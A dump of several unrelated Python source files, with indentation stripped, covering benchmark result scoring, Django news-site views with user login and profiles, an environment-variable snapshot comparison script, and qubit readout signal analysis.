df[col] = df[col].astype(np.float).map(partial(num_print, "{:.1f}".format)).astype(np.float)
for col in high_precision_float_cols:
df[col] = df[col].map(partial(num_print, "{:.6g}".format)).astype(np.float)
return df
def _load(self):
return self.load_df(self._score_file())
def save(self, append=False):
self.save_df(self.as_printable_data_frame(), path=self._score_file(), append=append)
def append(self, board_or_df, no_duplicates=True):
to_append = board_or_df.as_data_frame() if isinstance(board_or_df, Scoreboard) else board_or_df
scores = self.as_data_frame().append(to_append, sort=False)
if no_duplicates:
scores = scores.drop_duplicates()
return Scoreboard(scores=scores,
framework_name=self.framework_name,
benchmark_name=self.benchmark_name,
task_name=self.task_name,
scores_dir=self.scores_dir)
def _score_file(self):
sep = rconfig().token_separator
if self.framework_name:
if self.task_name:
file_name = f"{self.framework_name}{sep}task_{self.task_name}.csv"
elif self.benchmark_name:
file_name = f"{self.framework_name}{sep}benchmark_{self.benchmark_name}.csv"
else:
file_name = f"{self.framework_name}.csv"
else:
if self.task_name:
file_name = f"task_{self.task_name}.csv"
elif self.benchmark_name:
file_name = f"benchmark_{self.benchmark_name}.csv"
else:
file_name = Scoreboard.results_file
return os.path.join(self.scores_dir, file_name)
class TaskResult:
@staticmethod
# @profile(logger=log)
def load_predictions(predictions_file):
log.info("Loading predictions from `%s`.", predictions_file)
if os.path.isfile(predictions_file):
df = read_csv(predictions_file, dtype=object)
log.debug("Predictions preview:\n %s\n", df.head(10).to_string())
if rconfig().test_mode:
TaskResult.validate_predictions(df)
if df.shape[1] > 2:
return ClassificationResult(df)
else:
return RegressionResult(df)
else:
log.warning("Predictions file `%s` is missing: framework either failed or could not produce any prediction.", predictions_file)
return NoResult("Missing predictions.")
@staticmethod
# @profile(logger=log)
def save_predictions(dataset: Dataset, output_file: str,
predictions=None, truth=None,
probabilities=None, probabilities_labels=None,
target_is_encoded=False,
preview=True):
""" Save class probabilities and predicted labels to file in csv format.
:param dataset:
:param output_file:
:param probabilities:
:param predictions:
:param truth:
:param probabilities_labels:
:param target_is_encoded:
:param preview:
:return: None
"""
log.debug("Saving predictions to `%s`.", output_file)
remap = None
if probabilities is not None:
prob_cols = probabilities_labels if probabilities_labels else dataset.target.label_encoder.classes
df = to_data_frame(probabilities, columns=prob_cols)
if probabilities_labels:
df = df[sort(prob_cols)] # reorder columns alphabetically: necessary to match label encoding
if any(prob_cols != df.columns.values):
encoding_map = {prob_cols.index(col): i for i, col in enumerate(df.columns.values)}
remap = np.vectorize(lambda v: encoding_map[v])
else:
df = to_data_frame(None)
preds = predictions
truth = truth if truth is not None else dataset.test.y
if not _encode_predictions_and_truth_ and target_is_encoded:
if remap:
predictions = remap(predictions)
truth = remap(truth)
preds = dataset.target.label_encoder.inverse_transform(predictions)
truth = dataset.target.label_encoder.inverse_transform(truth)
if _encode_predictions_and_truth_ and not target_is_encoded:
preds = dataset.target.label_encoder.transform(predictions)
truth = dataset.target.label_encoder.transform(truth)
df = df.assign(predictions=preds)
df = df.assign(truth=truth)
if preview:
log.info("Predictions preview:\n %s\n", df.head(20).to_string())
backup_file(output_file)
write_csv(df, path=output_file)
log.info("Predictions saved to `%s`.", output_file)
@staticmethod
def validate_predictions(predictions: pd.DataFrame):
names = predictions.columns.values
assert len(names) >= 2, "predictions frame should have 2 columns (regression) or more (classification)"
assert names[-1] == "truth", "last column of predictions frame must be named `truth`"
assert names[-2] == "predictions", "last column of predictions frame must be named `predictions`"
if len(names) == 2: # regression
for name, col in predictions.items():
pd.to_numeric(col) # pandas will raise if we have non-numerical values
else: # classification
predictors = names[:-2]
probabilities, preds, truth = predictions.iloc[:,:-2], predictions.iloc[:,-2], predictions.iloc[:,-1]
assert np.array_equal(predictors, np.sort(predictors)), "Predictors columns are not sorted in lexicographic order."
assert set(np.unique(predictors)) == set(predictors), "Predictions contain multiple columns with the same label."
for name, col in probabilities.items():
pd.to_numeric(col) # pandas will raise if we have non-numerical values
if _encode_predictions_and_truth_:
assert np.array_equal(truth, truth.astype(int)), "Values in truth column are not encoded."
assert np.array_equal(preds, preds.astype(int)), "Values in predictions column are not encoded."
predictors_set = set(range(len(predictors)))
validate_row = lambda r: r[:-2].astype(float).values.argmax() == r[-2]
else:
predictors_set = set(predictors)
validate_row = lambda r: r[:-2].astype(float).idxmax() == r[-2]
truth_set = set(truth.unique())
if predictors_set < truth_set:
log.warning("Truth column contains values unseen during training: no matching probability column.")
if predictors_set > truth_set:
log.warning("Truth column doesn't contain all the possible target values: the test dataset may be too small.")
predictions_set = set(preds.unique())
assert predictions_set <= predictors_set, "Predictions column contains unexpected values: {}.".format(predictions_set - predictors_set)
assert predictions.apply(validate_row, axis=1).all(), "Predictions don't always match the predictor with the highest probability."
@classmethod
def score_from_predictions_file(cls, path):
sep = rconfig().token_separator
folder, basename = os.path.split(path)
folder_g = collections.defaultdict(lambda: None)
if folder:
folder_pat = rf"/(?P<framework>[\w\-]+?){sep}(?P<benchmark>[\w\-]+){sep}(?P<constraint>[\w\-]+){sep}(?P<mode>[\w\-]+)({sep}(?P<datetime>\d{8}T\d{6}))/"
folder_m = re.match(folder_pat, folder)
if folder_m:
folder_g = folder_m.groupdict()
file_pat = rf"(?P<framework>[\w\-]+?){sep}(?P<task>[\w\-]+){sep}(?P<fold>\d+)\.csv"
file_m = re.fullmatch(file_pat, basename)
if not file_m:
log.error("Predictions file `%s` has wrong naming format.", path)
return None
file_g = file_m.groupdict()
framework_name = file_g['framework']
task_name = file_g['task']
fold = int(file_g['fold'])
constraint = folder_g['constraint']
benchmark = folder_g['benchmark']
task = Namespace(name=task_name, id=task_name)
if benchmark:
try:
tasks, _, _ = rget().benchmark_definition(benchmark)
task = next(t for t in tasks if t.name==task_name)
except:
pass
result = cls.load_predictions(path)
task_result = cls(task, fold, constraint, '')
metrics = rconfig().benchmarks.metrics[result.type.name]
return task_result.compute_scores(framework_name, metrics, result=result)
def __init__(self, task_def, fold: int, constraint: str, predictions_dir=None):
self.task = task_def
self.fold = fold
self.constraint = constraint
self.predictions_dir = (predictions_dir if predictions_dir
else output_dirs(rconfig().output_dir, rconfig().sid, ['predictions']).predictions)
@memoize
def get_result(self):
return self.load_predictions(self._predictions_file)
def get_metadata(self):
return json_load(self._metadata_file, as_namespace=True)
@profile(logger=log)
def compute_scores(self, result=None, meta_result=None):
meta_result = Namespace({} if meta_result is None else meta_result)
metadata = self.get_metadata()
scores = Namespace(
id=self.task.id,
task=self.task.name,
constraint=self.constraint,
framework=metadata.framework,
version=metadata.version if 'version' in metadata else metadata.framework_version,
params=str(metadata.framework_params) if len(metadata.framework_params) > 0 else '',
fold=self.fold,
mode=rconfig().run_mode,
seed=metadata.seed,
app_version=rget().app_version,
utc=datetime_iso(),
metric=metadata.metric,
duration=nan
)
required_metares = ['training_duration', 'predict_duration', 'models_count']
for m in required_metares:
scores[m] = meta_result[m] if m in meta_result else nan
result = self.get_result() if result is None else result
for metric in metadata.metrics:
score = result.evaluate(metric)
scores[metric] = score
scores.result = scores[scores.metric] if scores.metric in scores else result.evaluate(scores.metric)
scores.info = result.info
scores % Namespace({k: v for k, v in meta_result if k not in required_metares})
log.info("Metric scores: %s", scores)
return scores
@property
def _predictions_file(self):
return os.path.join(self.predictions_dir, self.task.name, str(self.fold), "predictions.csv")
@property
def _metadata_file(self):
return os.path.join(self.predictions_dir, self.task.name, str(self.fold), "metadata.json")
class Result:
def __init__(self, predictions_df, info=None):
self.df = predictions_df
self.info = info
self.truth = self.df.iloc[:, -1].values if self.df is not None else None
self.predictions = self.df.iloc[:, -2].values if self.df is not None else None
self.target = None
self.type = None
def evaluate(self, metric):
if hasattr(self, metric):
return getattr(self, metric)()
# raise ValueError("Metric {metric} is not supported for {type}.".format(metric=metric, type=self.type))
log.warning("Metric %s is not supported for %s!", metric, self.type)
return nan
class NoResult(Result):
def __init__(self, info=None):
super().__init__(None, info)
self.missing_result = np.nan
def evaluate(self, metric):
return self.missing_result
class ErrorResult(NoResult):
def __init__(self, error):
msg = "{}: {}".format(type(error).__qualname__ if error is not None else "Error", error)
max_len = rconfig().results.error_max_length
msg = msg if len(msg) <= max_len else (msg[:max_len - 3] + '...')
super().__init__(msg)
class ClassificationResult(Result):
def __init__(self, predictions_df, info=None):
super().__init__(predictions_df, info)
self.classes = self.df.columns[:-2].values.astype(str, copy=False)
self.probabilities = self.df.iloc[:, :-2].values.astype(float, copy=False)
self.target = Feature(0, 'class', 'categorical', values=self.classes, is_target=True)
self.type = DatasetType.binary if len(self.classes) == 2 else DatasetType.multiclass
self.truth = self._autoencode(self.truth.astype(str, copy=False))
self.predictions = self._autoencode(self.predictions.astype(str, copy=False))
self.labels = self._autoencode(self.classes)
def acc(self):
return float(accuracy_score(self.truth, self.predictions))
def balacc(self):
return float(balanced_accuracy_score(self.truth, self.predictions))
def auc(self):
if self.type != DatasetType.binary:
# raise ValueError("AUC metric is only supported for binary classification: {}.".format(self.classes))
log.warning("AUC metric is only supported for binary classification: %s.", self.labels)
return nan
return float(roc_auc_score(self.truth, self.probabilities[:, 1], labels=self.labels))
def cm(self):
return confusion_matrix(self.truth, self.predictions, labels=self.labels)
def _per_class_errors(self):
return [(s-d)/s for s, d in ((sum(r), r[i]) for i, r in enumerate(self.cm()))]
def mean_pce(self):
"""mean per class error"""
return statistics.mean(self._per_class_errors())
def max_pce(self):
"""max per class error"""
return max(self._per_class_errors())
def f1(self):
return float(f1_score(self.truth, self.predictions, labels=self.labels))
def logloss(self):
return float(log_loss(self.truth, self.probabilities, labels=self.labels))
def _autoencode(self, vec):
needs_encoding = not _encode_predictions_and_truth_ or (isinstance(vec[0], str) and not vec[0].isdigit())
return self.target.label_encoder.transform(vec) if needs_encoding else vec
class RegressionResult(Result):
def __init__(self, predictions_df, info=None):
super().__init__(predictions_df, info)
self.truth = self.truth.astype(float, copy=False)
self.target = Feature(0, 'target', 'real', is_target=True)
self.type = DatasetType.regression
def mae(self):
return float(mean_absolute_error(self.truth, self.predictions))
def mse(self):
return float(mean_squared_error(self.truth, self.predictions))
def msle(self):
return float(mean_squared_log_error(self.truth, self.predictions))
def rmse(self):
return math.sqrt(self.mse())
def rmsle(self):
return math.sqrt(self.msle())
def r2(self):
return float(r2_score(self.truth, self.predictions))
_encode_predictions_and_truth_ = False
save_predictions = TaskResult.save_predictions
|
<filename>main/views.py
from django.shortcuts import render,redirect
from django.http import HttpRequest
from .forms import CreateUserForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.forms import UserCreationForm
from .models import Category, NewsDetail,Profile
from .forms import CreateUserForm, UserUpdateForm, ProfileUpdateForm
from django.contrib.auth.decorators import login_required
# Create your views here.
# creating my logic here
def registerPage(request):
if request.user.is_authenticated:
return redirect ('home')
else:
form=CreateUserForm
if request.method=='POST':
form=CreateUserForm(request.POST)
if form.is_valid():
form.save()
user=form.cleaned_data.get("username")
messages.info(request, 'Account was created for ' + user)
return redirect('login')
context={'form':form}
return render (request,'accounts/register.html', context)
# login logic here
def loginPage(request):
if request.user.is_authenticated:
return redirect ('home')
else:
if request.method=="POST":
username=request.POST.get('username')
password=<PASSWORD>.POST.<PASSWORD>('password')
user=authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('home')
else:
messages.info(request, "Username or Password is incorrect!!!, kindly check your details")
context={}
return render (request,'accounts/login.html', context)
def logoutUser(request):
logout(request)
return redirect('login')
#home page here
@login_required(login_url='login')
def home(request):
content={}
return render(request, 'home.html', content)
def newshome(request):
# search goes here
if 'seacrh' in request.GET:
search=request.GET['search']
categories=Category.objects.filter(category__icontains=search)
else:
categories=Category.objects.all()
# quering the category class
category=request.GET.get('category')
if category ==None:
newsContents=NewsDetail.objects.all()
else:
newsContents=NewsDetail.objects.filter(category__name=category)
categories=Category.objects.all()
# newsContents=NewsDetail.objects.all()
content={'categories':categories, 'newsContents':newsContents}
return render(request, 'newshome.html', content)
# the newsdetails template
def newsdetails(request,pk):
contents=NewsDetail.objects.get(id=pk)
context={'content':contents}
return render(request,'newsdetails.html',context)
# the addnews temmplate
def addnews(request):
categories=Category.objects.all()
if request.method=="POST":
data= request.POST
image=request.FILES.get('image')
if data['category']!='none':
category=Category.objects.get(id=data['category'])
elif data['newcategory'] !='':
category, created=Category.objects.get_or_create(name=data['newcategory'])
else:
category=None
newsdetail=NewsDetail.objects.create(
category=category,
description=data['description'],
date_posted=data['posted'],
postedby=data['source'],
image=image
)
return redirect ('newshome')
content={'categories':categories,}
return render(request,'addnews.html',content)
#search news by category
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
searched_articles = NewsDetail.search_category(search_term)
message = f"{search_term}"
return render(request, 'search.html',{"message":message,"categories": searched_articles})
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
# profile details
def userPage(request):
context = {}
return render(request,'user.html',context)
def profile(request):
user = request.user
user = Profile.objects.get_or_create(user= request.user)
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated successfully!')
return redirect('home')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
'user': user
}
return render(request, 'profile.html', context) |
# -*- coding: utf-8 -*-
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Compare environment variables snapshot with expected and detect changes
"""
import argparse
import difflib
import logging
import pathlib
import re
import os
import sys
import typing
import uuid
def normalize_env_variables(variables: typing.Dict[str, str]) -> typing.Dict[str, str]:
"""Cleanup environment variables dict from duplicates in PATH-like variables"""
output = {}
for name, value in variables.items():
if name in ['PATH', 'PYTHONPATH', 'PKG_CONFIG_PATH', 'LD_LIBRARY_PATH', 'LIBRARY_PATH', 'OV_FRONTEND_PATH']:
paths = set(filter(None, map(str.strip, value.split(':'))))
output[name] = ':'.join(sorted(paths))
else:
output[name] = value
return output
def extract_changed_environment_variables(vars_before: typing.Dict[str, str],
vars_after: typing.Dict[str, str]) -> typing.Dict[str, str]:
"""Extract current values of environment variables (and handle PATH-like variables as set of values)"""
return normalize_env_variables(dict(set(vars_after.items()) - set(vars_before.items())))
def load_variables(path: str, env_prefix: bool = False) -> typing.Dict[str, str]:
"""Load environment variables and its values from and env output or a dockerfile-like file"""
variables = {}
pattern = re.compile(r'^ENV\s+([A-Za-z_]+)=(.*)$' if env_prefix else r'^([A-Za-z_]+)=(.*)$')
with open(path) as file:
for record in filter(None, map(str.strip, file.readlines())):
match = pattern.match(record)
if not match:
return {}
name = match.group(1)
value = match.group(2)
variables[name] = value
return normalize_env_variables(variables)
def save_env_template(path: pathlib.Path, variables: typing.Dict[str, str]):
"""Save environment variables dict in the file in dockerfile-like format"""
with open(path, mode='w') as template:
for name, value in variables.items():
template.write(f'ENV {name}={value}\n')
def compare_templates(expected_path: pathlib.Path, actual_path: pathlib.Path, image: str, log: str):
"""Compare two template files and save HTML diff"""
with open(expected_path, mode='r') as expected, \
open(actual_path, mode='r') as actual, \
open(pathlib.Path(log) / f'env_{uuid.uuid4()}.html', mode='w') as html_log:
html_log.write(difflib.HtmlDiff(wrapcolumn=100).make_file(expected.readlines(), actual.readlines(),
'origin', image, context=True))
def main() -> int:
"""Compare environment variables snapshot with expected and create HTML report if different"""
parser = argparse.ArgumentParser(prog=os.path.basename(__file__),
description='This is script to extract environment variables changes from '
'snapshots, compare with expected and create HTML diff report '
'if different',
add_help=True)
parser.add_argument(
'-i',
'--image',
metavar='NAME',
required=True,
help='Image name',
)
parser.add_argument(
'-e',
'--expected',
metavar='PATH',
required=True,
help='Path to file with expected environment variable changes from the script',
)
parser.add_argument(
'-b',
'--before',
metavar='PATH',
required=True,
help='Path to file with environment variables snapshot before script launch',
)
parser.add_argument(
'-a',
'--after',
metavar='PATH',
required=True,
help='Path to file with environment variables snapshot after script launch',
)
parser.add_argument(
'-l',
'--logs',
metavar='PATH',
default=str(pathlib.Path(os.path.realpath(__file__)).parent),
help='Log path folder to store logs',
)
args = parser.parse_args()
logging.basicConfig(level='INFO')
log = logging.getLogger(__name__)
log.info(f'Parsing inputs...')
vars_before = load_variables(args.before)
vars_after = load_variables(args.after)
vars_created = {name: vars_after[name] for name in set(vars_after.keys()) - set(vars_before.keys())}
vars_expected = load_variables(args.expected, True)
vars_expected_updated = {name: vars_after[name] for name in vars_after if name in vars_expected}
vars_current = {**vars_expected, **vars_created, **vars_expected_updated}
log.info('Generate updated environment variables template and search for changes:')
output_path = pathlib.Path(args.logs) / os.path.basename(args.expected)
save_env_template(output_path, vars_current)
if vars_expected != vars_current:
exit_code = 1
vars_changed_script = extract_changed_environment_variables(vars_before, vars_after)
vars_changed = extract_changed_environment_variables(vars_expected, vars_current)
log.error('FAILED: changes detected')
log.error(f' after script launch {vars_changed_script}')
log.error(f' with expected {vars_changed}')
compare_templates(args.expected, output_path, args.image, args.logs)
else:
exit_code = 0
log.info('PASSED')
if vars_created:
exit_code = 1
log.error(f'FAILED: new variables are created - {vars_created}')
if exit_code:
log.info(f'See logs in {args.logs}')
return exit_code
if __name__ == '__main__':
sys.exit(main())
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 29 09:40:12 2021
@author: <NAME>
Set up function module that can assist in loading pulse sequences into AWG
and functionalizing Alazar acquiring
"""
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.patches import Ellipse
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
from matplotlib.colors import Normalize as Norm
from plottr.data.datadict_storage import all_datadicts_from_hdf5
from scipy.signal import butter, lfilter, sosfilt
from scipy.stats import tstd
from scipy.special import gamma
#plotting variance in the data wrt time
from plottr.data.datadict_storage import all_datadicts_from_hdf5
gfit = lambda x, s, m, A: A*np.exp(-0.5*((x-m)/s)**2)
def pfit(x, m, A, scale):
return A*np.power(m, x*scale)*np.exp(-m)/gamma(x*scale)
def custom_var(data_slice, debug = False, timestamp = 2000, trace = 0, method = 'gauss', title = '', fit = 0):
'''
we don't trust the numpy var, because by eye it doesn't look like it's changing that much
so this fuction will take in an array that is [nrecords x 1], create a histogram and fit
that histogram to a gaussian or poisson distribution to extract variance, which is what our eyes are doing
'''
plt.figure()
plt.title(f"trace {trace} time {timestamp}ns {title} distribution over records")
h1, bins = np.histogram(data_slice, bins = 100, density = True)
plt.plot(bins[:-1], h1, '.', label = 'data')
if fit:
if method == 'gauss':
popt, pcov = curve_fit(gfit, bins[:-1], h1, maxfev = 10000, p0 = [np.max(np.abs(bins))/10, bins[50], 150])
elif method == 'poisson':
popt, pcov = curve_fit(pfit, bins[:-1], h1)
if debug:
if method == 'gauss':
plt.plot(bins[:-1], gfit(bins[:-1], *popt), label = f'{method} fit')
elif method == 'poisson':
plt.plot(bins[:-1], pfit(bins[:-1], *popt), label = f'{method} fit')
#have to be careful here, because this fit is to a scalable x-axis
#so in terms of the real voltage, the mean is actually popt[0]/popt[-1]
#the second parameter A should be irrelevant
popt[0] = popt[0]/popt[-1]
plt.title(f"trace {trace} time {timestamp}ns {title} distribution over records")
plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),
fancybox=True, shadow=True, ncol=5)
return np.abs(popt[0])
def plot_custom_stats_from_filepath(filepath, timeslice = 100, trace = 0, debug = 0, fit = 0):
dicts = all_datadicts_from_hdf5(filepath)['data']
# print(dicts)
data_name_list = [x for x in dicts.keys() if x[0] == 'I' or x[0] == 'Q']
time = np.unique(dicts['time']['values'])
time_num = np.size(time)
rec_num = np.size(dicts['time']['values'])//time_num
I_list = [name for name in data_name_list if name[0]=='I']
Q_list = [name for name in data_name_list if name[0]=='Q']
print(I_list)
Pvar_arr = []
Pvar_fit_arr = []
Pavg_arr = []
for i, (I_name, Q_name) in enumerate(zip(I_list, Q_list)):
if i == trace:
print(f"Looking at the {i, I_name, Q_name} trace")
Idata = dicts[I_name]['values'].reshape(rec_num, time_num)
Qdata = dicts[Q_name]['values'].reshape(rec_num, time_num)
Pavg = np.average(np.sqrt(Idata**2+Qdata**2), axis = 0)
Pvar = tstd(np.sqrt(Idata**2+Qdata**2), axis = 0)**2
Pvar_arr.append(Pvar[timeslice])
Pavg_arr.append(Pavg[timeslice])
Pvar_fit = custom_var(np.sqrt(Idata**2+Qdata**2)[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'poisson', title = 'Power', fit = fit)
Pvar_fit_arr.append(Pvar_fit)
Ivar_fit = custom_var(Idata[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'gauss', title = "I", fit = fit)
Qvar_fit = custom_var(Qdata[:, timeslice], debug = debug, timestamp = timeslice*20, trace = I_name[-1], method = 'gauss', title = 'Q', fit = fit)
# if debug:
# plt.figure()
# plt.plot(Pavg)
# plt.title("DEBUG: Average vs. sample_num")
return np.array(Pvar_arr), np.array(Pvar_fit_arr), np.array(Pavg_arr), Ivar_fit, Qvar_fit
def plot_stats_from_filepath(filepath, plt_avg = 0, plt_var = 1, vscale = 100, plot = 0):
dicts = all_datadicts_from_hdf5(filepath)['data']
data_name_list = [x for x in dicts.keys() if x[0] == 'I' or x[0] == 'Q']
time = np.unique(dicts['time']['values'])
time_num = np.size(time)
rec_num = np.size(dicts['time']['values'])//time_num
variance_dict = {}
if plot:
fig, axs = plt.subplots(3,2, figsize = (16,12))
fig.suptitle(filepath.split('\\')[-1])
I_list = [name for name in data_name_list if name[0]=='I']
Q_list = [name for name in data_name_list if name[0]=='Q']
titles = ["G", "E", "F"]
Pvar_arr = []
Pavg_arr = []
for i, (I_name, Q_name) in enumerate(zip(I_list, Q_list)):
Idata = dicts[I_name]['values'].reshape(rec_num, time_num)
Qdata = dicts[Q_name]['values'].reshape(rec_num, time_num)
I_at_rec0 = Idata[:, 30]
I_at_rec1 = Idata[:, 100]
if plot:
plt.figure()
print("first val: ", I_at_rec0[0])
print("max val: ", np.max(I_at_rec0))
plt.plot(I_at_rec0-np.average(I_at_rec0), '.', label = 'time 30*20ns')
plt.plot(I_at_rec1-np.average(I_at_rec1), '.', label = 'time 90*20ns')
plt.title(titles[i])
plt.legend()
print("variance at first value: ", np.var(I_at_rec0-np.average(I_at_rec0)))
print("variance at second value: ", np.var(I_at_rec1-np.average(I_at_rec1)))
plt.figure()
h1 = np.histogram(I_at_rec1-np.average(I_at_rec0), bins = 50, density = True)
h2 = np.histogram(I_at_rec1-np.average(I_at_rec1), bins = 50, density = True)
plt.plot(h1[1][:-1], h1[0])
plt.plot(h2[1][:-1], h2[0])
Pavg = np.average(np.sqrt(Idata**2+Qdata**2), axis = 0)
Pvar = tstd(np.sqrt(Idata**2+Qdata**2), axis = 0)**2
Pvar_arr.append(Pvar)
Pavg_arr.append(Pavg)
for name in I_list:
data = dicts[name]['values'].reshape(rec_num, time_num)
avg = np.average(data, axis = 0)
var = np.var(data-np.average(data, axis = 0), axis = 0)
var_coherent = var/np.sqrt(np.abs(avg))
variance_dict[name] = var
if plot:
axs[0, 0].fill_between(time, np.average(data, axis = 0)-vscale*var, np.average(data, axis = 0)+vscale*var, label = name)
axs[0,0].plot(time, np.average(data, axis = 0))
axs[1, 0].plot(time, var, label = name)
if plot:
axs[0,0].set_title("Averages")
axs[1,0].set_title("Variances")
axs[0,0].grid()
axs[1,0].grid()
axs[0,0].legend()
axs[1,0].legend()
for name in Q_list:
data = dicts[name]['values'].reshape(rec_num, time_num)
var = np.var(data, axis = 0)
variance_dict[name] = var
var_coherent = var/np.sqrt(np.abs(avg))
if plot:
axs[0, 1].fill_between(time, np.average(data, axis = 0)-vscale*var, np.average(data, axis = 0)+vscale*var, label = name)
axs[0,1].plot(time, np.average(data, axis = 0))
axs[1, 1].plot(time, var, label = name)
if plot:
axs[2,0].plot(time, Pavg)
axs[2,1].plot(time, Pvar)
axs[0,1].set_title("Averages")
axs[1,1].set_title("Variances")
axs[0,1].grid()
axs[1,1].grid()
axs[0,1].legend()
axs[1,1].legend()
fig.tight_layout()
return zip(np.array(Pvar_arr), np.array(Pavg_arr))
def Process_One_Acquisition_3_state(name, time_vals, sI_c1, sI_c2, sI_c3, sQ_c1 ,sQ_c2, sQ_c3, figscale = 1, hist_scale = 200, odd_only = False, even_only = False, plot = False, lpf = True, lpf_wc = 1e6, fit = False, hist_y_scale = 10, boxcar = False, bc_window = [50, 150], record_track = False, rec_start = 0, rec_stop = 7860, debug = False, tstart_index = 0, tstop_index = -1, guess = 0, rec_skip = 5):
fs = 1/np.diff(time_vals)[0]
print('\n\n\nsampling rate: ', fs)
sI_c1 = sI_c1[rec_start:rec_stop:rec_skip].copy()
sI_c2 = sI_c2[rec_start:rec_stop:rec_skip].copy()
sI_c3 = sI_c3[rec_start:rec_stop:rec_skip].copy()
sQ_c1 = sQ_c1[rec_start:rec_stop:rec_skip].copy()
sQ_c2 = sQ_c2[rec_start:rec_stop:rec_skip].copy()
sQ_c3 = sQ_c3[rec_start:rec_stop:rec_skip].copy()
if lpf:
sI_c1_classify = np.empty(np.shape(sI_c1))
sI_c2_classify = np.empty(np.shape(sI_c1))
sI_c3_classify = np.empty(np.shape(sI_c1))
sQ_c1_classify = np.empty(np.shape(sI_c1))
sQ_c2_classify = np.empty(np.shape(sI_c1))
sQ_c3_classify = np.empty(np.shape(sI_c1))
for i, (rec1, rec2, rec3, rec4, rec5, rec6) in enumerate(zip(sI_c1, sI_c2, sI_c3, sQ_c1, sQ_c2, sQ_c3)):
sI_c1_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec1)
sI_c2_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec2)
sI_c3_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec3)
sQ_c1_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec4)
sQ_c2_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec5)
sQ_c3_classify[i] = lfilter(*butter(10, lpf_wc/1e9, fs=fs, btype='low', analog=False), rec6)
else:
sI_c1_classify = sI_c1
sI_c2_classify = sI_c2
sI_c3_classify = sI_c3
sQ_c1_classify = sQ_c1
sQ_c2_classify = sQ_c2
sQ_c3_classify = sQ_c3
sI_c1 = sI_c1_classify.copy()
sI_c2 = sI_c2_classify.copy()
sI_c3 = sI_c3_classify.copy()
sQ_c1 = sQ_c1_classify.copy()
sQ_c2 = sQ_c2_classify.copy()
sQ_c3 = sQ_c3_classify.copy()
if boxcar:
WF = np.zeros(np.size(time_vals))
WF[bc_window[0]:bc_window[1]] = 1
Sge_I = Sge_Q = Sgf_I = Sgf_Q = Sef_I = Sef_Q = WF#/(bc_window[1]-bc_window[0])
else:
tfilt = np.ones(np.size(np.unique(time_vals)))
tfilt[0:tstart_index] = 0
tfilt[tstop_index:-1] = 0
#weight functions denoted by Sij for telling trace i from trace j
Sge_I, Sge_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c2, axis = 0))*tfilt, (np.average(sQ_c1, axis = 0)-np.average(sQ_c2, axis = 0))*tfilt]
Sgf_I, Sgf_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c3, axis = 0))*tfilt, (np.average(sQ_c1, axis = 0)-np.average(sQ_c3, axis = 0))*tfilt]
Sef_I, Sef_Q = [(np.average(sI_c2, axis = 0)-np.average(sI_c3, axis = 0))*tfilt, (np.average(sQ_c2, axis = 0)-np.average(sQ_c3, axis = 0))*tfilt]
# if lpf:
# Sge = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sge)
# Sgf = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sgf)
# Sef = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sef)
#nromalizing weight functions
# Sge_I /= np.sum(np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)]))
# Sge_Q /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
# Sef_I /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sef_Q /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sgf_I /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
# Sgf_Q /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
sI_c1_avg = np.average(sI_c1, axis = 0)
sI_c2_avg = np.average(sI_c2, axis = 0)
sI_c3_avg = np.average(sI_c3, axis = 0)
sQ_c1_avg = np.average(sQ_c1, axis = 0)
sQ_c2_avg = np.average(sQ_c2, axis = 0)
sQ_c3_avg = np.average(sQ_c3, axis = 0)
if plot:
fig = plt.figure(1, figsize = tuple(np.array([12,8])*figscale))
fig.suptitle(name, fontsize = 20)
ax1 = fig.add_subplot(221)
ax1.set_title("I average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax1.plot(time_vals, np.average(sI_c1, axis = 0)*1000, label = 'G_records')
ax1.plot(time_vals,np.average(sI_c2, axis = 0)*1000, label = 'E_records')
ax1.plot(time_vals,np.average(sI_c3, axis = 0)*1000, label = 'F_records')
ax1.grid()
# ax1.set_aspect(1)
ax2 = fig.add_subplot(222)
ax2.set_title("Q average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax2.plot(time_vals,np.average(sQ_c1, axis = 0)*1000, label = 'G records')
ax2.plot(time_vals,np.average(sQ_c2, axis = 0)*1000, label = 'E records')
